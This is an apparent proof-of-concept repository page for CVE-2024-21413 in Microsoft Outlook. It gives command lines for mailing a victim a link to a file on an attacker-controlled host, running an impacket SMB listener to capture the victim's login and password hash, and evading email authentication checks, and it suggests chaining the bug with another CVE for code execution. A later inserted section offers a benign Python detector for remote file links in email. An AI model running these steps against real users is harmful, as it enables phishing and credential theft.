CVE-2024-21413 PoC — Microsoft Outlook Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title: Microsoft Outlook Remote Code Execution Vulnerability (CVE-2024-21413)
Description: Microsoft Outlook Remote Code Execution Vulnerability
Description
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC
Readme
# CVE-2024-21413 - POC

### Usage:
```
python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
```
> [!NOTE]
> r00tb1t is the shared test file (a Word document in this case) served from the attacker machine (xx.xx.xx.xx).
>
> To ensure compliance with SPF, DKIM, and DMARC, use a legitimate $IP and domain.
>
> Make sure to install the pexpect library, if you haven't already, using ```pip install pexpect```.

### Tips to execute the POC:
- [x] Run an SMB listener ```impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp```.
- [x] Run the POC
> ```python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url example.com/path/to/shared/file/r0tb1t.rtf```
- [x] Click on the link in the received mail, and BOOM, you should retrieve the login & hash in the listener
- [ ] chain this CVE with CVE-2023-21716 to obtain RCE !!!


> + Kudooooos &  [details on CVE-2024-21413](https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/) .
> + [Workaround/Fix:](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413)
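
A defender-side check for the kind of link this PoC mails out, added here as an example and not part of the original repository: it parses a message, collects anchor targets from its HTML parts, and flags any `file:` or UNC href that points at a remote host, since following such a link is what sends the login and hash to an outside SMB listener. The sample message and the host `files.example.net` are constructed placeholders.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample message; files.example.net is a placeholder host.
SAMPLE_EML = r"""From: sender@example.com
To: recipient@example.com
Subject: shared document
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="https://example.com/report">quarterly report</a>
<a href="file://files.example.net/share/doc.rtf">open document</a>
<a href="\\files.example.net\share\doc.rtf">same file</a>
</body></html>
"""

# A file: scheme or leading UNC backslashes, followed by the host component.
REMOTE_FILE = re.compile(r"^(?:file:[/\\]*|\\\\)([^/\\]+)", re.I)
# Drive letters and localhost are local paths, not remote shares.
LOCAL = re.compile(r"[a-z]:|localhost", re.I)

class _Hrefs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

def remote_file_links(raw_eml):
    """Return (href, host) for each anchor that targets a remote file share."""
    hits = []
    for part in message_from_string(raw_eml).walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "utf-8"
        parser = _Hrefs()
        parser.feed(part.get_payload(decode=True).decode(charset, errors="replace"))
        for href in parser.hrefs:
            m = REMOTE_FILE.match(href.strip())
            if m and not LOCAL.fullmatch(m.group(1)):
                hits.append((href, m.group(1).lower()))
    return hits

if __name__ == "__main__":
    for href, host in remote_file_links(SAMPLE_EML):
        print(f"remote file link to {host}: {href}")
```

A mail gateway or triage script can quarantine or rewrite messages for which `remote_file_links` returns any hit, alongside blocking outbound SMB at the perimeter.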


> [!CAUTION]
> ⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script.

File Snapshot

```
[4.0K] /data/pocs/ca98eca35d578d5ba1747525ae2c0a4b5fb9b440
├── [1.5K] CVE-2024-21413.py
└── [1.6K] README.md

0 directories, 2 files
```